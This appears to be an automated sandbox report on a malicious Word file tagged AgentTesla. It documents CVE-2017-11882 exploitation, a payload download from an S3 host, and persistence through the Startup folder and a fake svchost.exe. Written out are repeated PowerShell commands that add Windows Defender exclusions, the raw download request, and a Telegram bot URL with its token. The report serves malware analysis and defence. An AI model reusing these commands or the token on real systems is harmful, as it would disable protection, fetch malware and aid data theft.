Analysis Report Allignright_companyprofile.doc

Overview

General Information

Sample Name: Allignright_companyprofile.doc
Analysis ID: 404236
MD5: 5a0c6dd1f7bbc5272f2ced270e2d4d8a
SHA1: 9f553e08793745277db8a0d3aa82a63b7526a28b
SHA256: fbc12470553e748b10dd0e1a15c6e28a1e777b626757349e46031f7e0608b8e6
Tags: AgentTesla, doc

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Powershell adding suspicious path to exclusion list
Yara detected AgentTesla
Adds a directory exclusion to Windows Defender
Creates an autostart registry key pointing to binary in C:\Windows
Drops PE files to the startup folder
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Non Interactive PowerShell
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 1796 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 1296 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • CTF loader_es.exe (PID: 2336 cmdline: C:\Users\user\AppData\Roaming\CTF loader_es.exe MD5: D96F52FC8733D2F4A127BDC44D4CEB25)
      • powershell.exe (PID: 2536 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 2300 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 2772 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 2852 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • Bw6d8Paf6bOV36xS4N6.exe (PID: 2368 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' MD5: D96F52FC8733D2F4A127BDC44D4CEB25)
        • powershell.exe (PID: 1552 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
        • powershell.exe (PID: 660 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
        • powershell.exe (PID: 2812 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
        • powershell.exe (PID: 2804 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 2252 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 3064 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 920 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • CTF loader_es.exe (PID: 2444 cmdline: C:\Users\user\AppData\Roaming\CTF loader_es.exe MD5: D96F52FC8733D2F4A127BDC44D4CEB25)
      • CTF loader_es.exe (PID: 2788 cmdline: C:\Users\user\AppData\Roaming\CTF loader_es.exe MD5: D96F52FC8733D2F4A127BDC44D4CEB25)
  • Bw6d8Paf6bOV36xS4N6.exe (PID: 1192 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' MD5: D96F52FC8733D2F4A127BDC44D4CEB25)
    • powershell.exe (PID: 2920 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
    • powershell.exe (PID: 2300 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
    • powershell.exe (PID: 2760 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
    • powershell.exe (PID: 1900 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
  • svchost.exe (PID: 2916 cmdline: 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' MD5: D96F52FC8733D2F4A127BDC44D4CEB25)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection, Author: Joe Security, Data: DestinationIp: 52.218.240.113, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1296, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1296, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started, Author: Florian Roth, Data: Command: C:\Users\user\AppData\Roaming\CTF loader_es.exe, CommandLine: C:\Users\user\AppData\Roaming\CTF loader_es.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\CTF loader_es.exe, NewProcessName: C:\Users\user\AppData\Roaming\CTF loader_es.exe, OriginalFileName: C:\Users\user\AppData\Roaming\CTF loader_es.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1296, ProcessCommandLine: C:\Users\user\AppData\Roaming\CTF loader_es.exe, ProcessId: 2336
Sigma detected: Non Interactive PowerShell
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\CTF loader_es.exe, ParentImage: C:\Users\user\AppData\Roaming\CTF loader_es.exe, ParentProcessId: 2336, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force, ProcessId: 2536

Malware Analysis System Evasion:

Sigma detected: Powershell adding suspicious path to exclusion list
Source: Process started, Author: Joe Security, Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\CTF loader_es.exe, ParentImage: C:\Users\user\AppData\Roaming\CTF loader_es.exe, ParentProcessId: 2336, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force, ProcessId: 2300

Signature Overview

AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe, Virustotal: Detection: 41%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe, ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe, Virustotal: Detection: 41%
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe, ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe, Virustotal: Detection: 41%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe, ReversingLabs: Detection: 44%
Source: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe, ReversingLabs: Detection: 44%
Multi AV Scanner detection for submitted file
Source: Allignright_companyprofile.doc, ReversingLabs: Detection: 14%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe, Joe Sandbox ML: detected
Source: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe, Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\user\AppData\Roaming\CTF loader_es.exe
Source: unknown, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: ??\C:\Windows\system32\netutils.dllhell\v1.0\netutils.dllnfig\v2.0.50727.312\security.config.cch.2536.6001966ion.pdby.resources.exes.exeI.ni.dll source: powershell.exe, 00000005.00000002.2117946573.00000000003F3000.00000004.00000020.sdmp
Source: Binary string: G??\C:\Windows\system32\netutils.dllhell\v1.0\netutils.dllnfig\v2.0.50727.312\security.config.cch.2772.6004244ion.pdb source: powershell.exe, 00000009.00000002.2119685464.000000000037A000.00000004.00000020.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2135376246.000000000579D000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2135376246.000000000579D000.00000004.00000001.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000007.00000002.2124286114.0000000002AD0000.00000002.00000001.sdmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Directory queried: number of queries: 2505
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe, File opened: C:\Users\user\AppData\
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe, File opened: C:\Users\user\
Source: global traffic, DNS query: name: miolouno.s3-us-west-2.amazonaws.com
Source: global traffic, TCP traffic: 192.168.2.22:49167 -> 52.218.240.113:80

Networking:

Uses the Telegram API (likely for C&C communication)
Source: unknown, DNS query: name: api.telegram.org
Source: global traffic, HTTP traffic detected:
  GET /mad.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: miolouno.s3-us-west-2.amazonaws.com
  Connection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{784A4D1B-DE8E-4300-98F0-AE5841A8170E}.tmp
Source: unknown, DNS traffic detected: queries for: miolouno.s3-us-west-2.amazonaws.com
Source: CTF loader_es.exe, 00000004.00000002.2186884993.0000000003C1A000.00000004.00000001.sdmp, String found in binary or memory: https://api.telegram.org/bot1774464259:AAF9FzZxHVqbPEcJ50c3sNsdvyt_OEQ0GcA/
Source: CTF loader_es.exe, 00000004.00000002.2186884993.0000000003C1A000.00000004.00000001.sdmp, String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip

System Summary:

Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\user\AppData\Roaming\CTF loader_es.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe, Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe, Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe, Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe, Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe, Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe, Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe, File created: C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044
Source: Joe Sandbox View, Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe FBF9AD4434424D18319916F523899A50C21535012A50D531ED30040F0B66970B
Source: Joe Sandbox View, Dropped File: C:\Users\user\AppData\Roaming\CTF loader_es.exe FBF9AD4434424D18319916F523899A50C21535012A50D531ED30040F0B66970B
Source: Joe Sandbox View, Dropped File: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe FBF9AD4434424D18319916F523899A50C21535012A50D531ED30040F0B66970B
Source: classification engine, Classification label: mal100.troj.adwa.expl.evad.winDOC@46/28@3/1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 5_2_0037ACEE AdjustTokenPrivileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 5_2_0037ACB7 AdjustTokenPrivileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 7_2_01F1ACEE AdjustTokenPrivileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 7_2_01F1ACB7 AdjustTokenPrivileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 9_2_0209ACEE AdjustTokenPrivileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 9_2_0209ACB7 AdjustTokenPrivileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 11_2_01D3ACEE AdjustTokenPrivileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 11_2_01D3ACB7 AdjustTokenPrivileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 14_2_0211ACEE AdjustTokenPrivileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 14_2_0211ACB7 AdjustTokenPrivileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 15_2_01CAACEE AdjustTokenPrivileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 15_2_01CAACB7 AdjustTokenPrivileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 17_2_01B8ACEE AdjustTokenPrivileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 17_2_01B8ACB7 AdjustTokenPrivileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 22_2_003CACEE AdjustTokenPrivileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 22_2_003CACB7 AdjustTokenPrivileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 24_2_01E8ACEE AdjustTokenPrivileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 24_2_01E8ACB7 AdjustTokenPrivileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 26_2_0200ACEE AdjustTokenPrivileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 26_2_0200ACB7 AdjustTokenPrivileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 28_2_025DACEE AdjustTokenPrivileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 28_2_025DACB7 AdjustTokenPrivileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 32_2_006DACEE AdjustTokenPrivileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 32_2_006DACB7 AdjustTokenPrivileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 34_2_0067ACEE AdjustTokenPrivileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 34_2_0067ACB7 AdjustTokenPrivileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 36_2_0043ACEE AdjustTokenPrivileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 36_2_0043ACB7 AdjustTokenPrivileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 38_2_01DEACEE AdjustTokenPrivileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 38_2_01DEACB7 AdjustTokenPrivileges
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\Desktop\~$lignright_companyprofile.doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Temp\CVRCBD6.tmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............................%.......................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............................R.......................0.......k.......................x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............................p.......................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....................................................0.......w.......................x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................0.......................l.......x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............................:.......................0...............................x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................W.......................0...............................x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................................................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................$...............................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................$...............................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................$.......<.......................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................$...............................0.......;...............|.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................$...............................0.......;.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G...............".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....................$.......C.......................0.......G.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................$...............................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................................................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....................................................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............................'.......................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............................y.......................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....................................................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....................................................0.......w.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................0.......................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................*.......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............................U.......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................p.......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............@.......$.......B.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............@.......$.......w.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............@.......P...............................0......./.......................8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............@.......P...............................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............@.......................................0.......;...............|.......8...............
